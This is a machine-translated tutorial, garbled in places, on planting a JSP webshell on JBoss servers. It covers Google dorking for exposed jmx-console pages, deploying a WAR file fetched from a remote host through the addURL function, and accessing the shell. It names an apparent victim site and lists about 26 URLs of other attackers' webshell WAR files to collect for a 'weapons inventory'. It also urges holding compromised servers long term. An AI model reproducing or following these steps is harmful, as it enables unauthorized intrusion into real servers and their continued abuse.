Webshell method with JBoss Vulnerability

JBoss is a large-scale application platform, which is hard to be accessed by common users. The more difficult it is to get to know, the more advanced it is. I borrowed a sentence from the Beijing Bus Driver Li suli, saying, "The only way to do what is competent is to do what is competent." This is also true for security, although the JBoss platform is difficult to grasp, as long as we find the Jboss door, it is as easy as penetration. In this article, we will learn how to obtain Jboss Webshell based on a JBoss vulnerability. Because of this research, we just click here.

　　I. Information Collection and collation 1. Search by vulnerability features

One notable feature of Jboss's entire vulnerability is "8080/jmx-console/". Of course, there are other features. This feature is mainly used to facilitate search in Google, now, google's search address is www.google.com.hk, which is not as effective as Google's search. In the Google input box, enter inurl: "8080/jmx-console/" to generate a bunch of results.

　　2. Visit the website and test the Vulnerability

View the searched records one by one to see if they can be accessed normally. Because of the timeliness of the search engine, although the results of some websites are in the search results, the website is no longer accessible for various reasons. If the website cannot be accessed normally, discard it. From the results we found that http://oa.tsingtaobeer-sales.com: 8080/jmx-console/website was accessible and then searched for "jboss. deployment ", find * flavor = URL, type = deployment.pdf, and click this link to see if the access is normal, as shown in 1.

Figure 1 Jboss test page

　　3. Add the war file address of Webshell

Compress the Jsp shell into a war file and upload the war to a web site accessible on the Internet. For example, the real address of the war in this example is http://www.cam ***** .com.hk/forum/forumdata/cache/war.war.pdf ". The current page address is http://oa.tsingtaobeer-sales.com: 8080/jmx-console/HtmlAdaptor? Action = inspectMBean & name = jboss. deployment % 3 Atype % 3 ddeploymentment% 2 Cflavor % 3DURL ", go to the page to find the" void addURL () "function, find the" http://www.cam ***** found. After the deployment is successful, a prompt is displayed, as shown in figure 3.

Figure 2 use the addURL function to download and deploy the war File

Figure 3 operation successful

4. Apply modifications to make the settings take effect

Return to the main interface again, as shown in Figure 4. In URLList, you will see the war address you just added and click "Apply Change" to make the setting take effect.

Figure 4 apply changes to make the settings take effect

　5. Enrich the "weapons inventory"

Observe URLList and find that the list is the address of war deployment. If you only have your own address in URLList through the previous steps, congratulations! You are the first to get the server, after obtaining the permissions of the server, you can upgrade and reinforce the server. After upgrading and hardening, the server may be "maintained" and used for a long time. In this example, copy the values in URLList to notepad and sort them out. Good guy has a 26war file. Its war address list is as follows:

Http: // 116.232.230.228/xm. war

Http: // 117.67.0.248/wc. war

Http: // 121.207.250.24/war.zip

Http: // 121.207.250.24/war1.zip

Http: // 189.54.19.69: 8181/cmd. war

Http: // 189.54.19.69: 8181/h2010.war

Http: // 192.168.1.56: 8080/System-Console/jsp/test. war

Http: // 203.246.56.27: 8080/safe. war

Http: // 210.51.25.183/icons/war. war

Http: // 221.137.124.253: 8080/System-Console/jsp/job. jsp

Http: // 221.137.124.253: 8080/System-Console/jsp/test. war

Http: // 61.178.73.149/job/no. war

Http://blog.avfree.cn/cmd.war

Http://blog.xiancn.com/Browser.war

Http://blog.xiancn.com/cmd.war

Http://jbosstest.webs.com/Browser.war

Http://www.acclaimedenterprises.com/tmp/browser.war

Http://www.camgear.com.hk/forum/forumdata/cache/Browser.war

Http://www.cfblog.com/honeywell/war.war

Http://www.laodu.com.cn/ri/hack.war

Http://www.nmgfb.com/coody.war

Http://www.posumex.com/bdd/user/war.war

Http://www.str0m.cn/1.war

Http://www.yunxi.net/cmd.war

Http://yese.yi.org/cmd.war

Http://yese.yi.org/war/cmd.war

Access these addresses in turn. Of course, there is also a simple way to copy these addresses and paste them in Flashget for download through Flashget. Although some war files in these addresses cannot be downloaded, four useful war files are obtained by sorting out and analyzing the downloaded war files. During the test, the author applies the war file, after several rounds of hard work, the war file is successfully changed to the obtained war file. Put these useful war files into the weapons warehouse to enrich the ammunition!

6. Obtain Webshell

Enter the address "http://oa.tsingtaobeer-sales.com: 8080/war" in the browser to test whether Webshell can be accessed normally, 5 shows, out of the JSP Webshell page we are familiar. Note that the war file and website path may be different during deployment, and the access address may be slightly different. Therefore, you need to perform more tests, some users can directly access them. Some users need to add the war package name. For details about how to obtain Jboss, you can go to www.antian365.com to view JBoss's Webshell video.

Figure 5 obtain Webshell